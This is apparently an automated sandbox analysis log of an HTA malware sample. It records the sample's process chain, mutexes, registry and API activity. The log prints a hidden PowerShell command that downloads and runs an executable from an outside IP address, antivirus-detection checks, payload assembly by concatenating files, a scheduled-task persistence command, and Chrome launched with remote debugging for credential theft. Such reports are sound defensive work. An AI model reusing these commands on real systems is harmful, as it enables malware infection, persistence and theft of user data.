Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, Settings.cs Base64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'GSe2Oo7ZEHEiTMVywbTAXsNRkSJMtBhaVgcpPzcyQpXUaDySFbW83On26eCIEiVa9tWWTFTzFu5prxcyewDgzHNcMYMl1E6l6AYRYKswSzVvzffbIf9tcDBnCKSYXk0HaChWzb7ScdBUr9A6DCGAVlZNDfVCWSyhqFeP6SJm6FaY2OrjlJTKVm6R0USE44YhVzYOoavT2cy3p0l0TRDDuiRT0b61T1mIVq9Wm0wfuuN1xmD1G4h06H0Vb/Fde4DGf9edrroQknCgcOn29zboLgWb4Rtwco9aQYT9QvRWsxLM4EA8geldkwnvM41CQ5ruxvOeMPGWToiZv0JLSo+X5wDkMpwL60QiT9rxnVgMehEUEASpiQCuxIAmINLf3nuhWPItctzIkZD1TxOccqmb9cdfvb4H9uVZd9xX27wSMRO3GHM5B8hKfNmnzEV/DTTwDzUiiDrwnqbVE4t3j+wRN4wNsedMGnlHi5KmqVeTtRtWwikfGJ8bJBa9Qsotu4v2nDaIfiCuxKQ7FRc3eXo4cs367L6+6n/E3SUnphfuG+hhFODCCGnwzrs985nTVNBp0sr7e7wDSh0PcNPqkZuSH8zOO8B2swybXWIX9Il4vzukYC/tm8JNG/eVBC+6mdQiP6QfrZ7YhuO7vzLZkP4alrKAwLq0V86FQoWGz7gbP2AJpHi/wCObps8WAjWTUAwIvH3qfi67jz1akIdUxD5MbedGqwgxsfxGgML5nn3U1Ugcwskxc4pOaJc6BN+j56cRA2dejXSpXEvgs1p0xmldi+zXYimFZQx8FnJPzuVgz9Rh9NRPsNbnEfIZiWCo/4Ba4WqSTTkuBFZL+yw+jxBMi28cX1NWcJtKOkVUw1zbnU8a3ucAxItDBicI23QMsdUIa5SSbW/74XwTBhDnnjHlFH+DQbp8mMW/tmOLJMuc12+n5qou4PDlwN24Bc5ceyPbcy09EC8BJDi16I9g1y3pow==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winHTA@118/128@0/11
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009941FA GetLastError,FormatMessageW, 28_2_009941FA
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00982010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 28_2_00982010
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981A0B AdjustTokenPrivileges,CloseHandle, 28_2_00981A0B
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 11_2_004044D1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 28_2_0098DD87
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004024FB CoCreateInstance, 11_2_004024FB
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00993A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 28_2_00993A0E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1548
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twtwbay0.tzv.ps1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: ugdKEDU.exe, 00000022.00000002.3565393312.000000000390C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SeP4o9Jp8A.hta Virustotal: Detection: 23%
Source: SeP4o9Jp8A.hta ReversingLabs: Detection: 18%
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\SeP4o9Jp8A.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE"
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe"
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp "C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp" /SL5="$60444,14491362,830464,C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe "C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe"
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp" /SL5="$70440,3422545,56832,C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE" Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp "C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp" /SL5="$60444,14491362,830464,C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe "C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp" /SL5="$70440,3422545,56832,C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
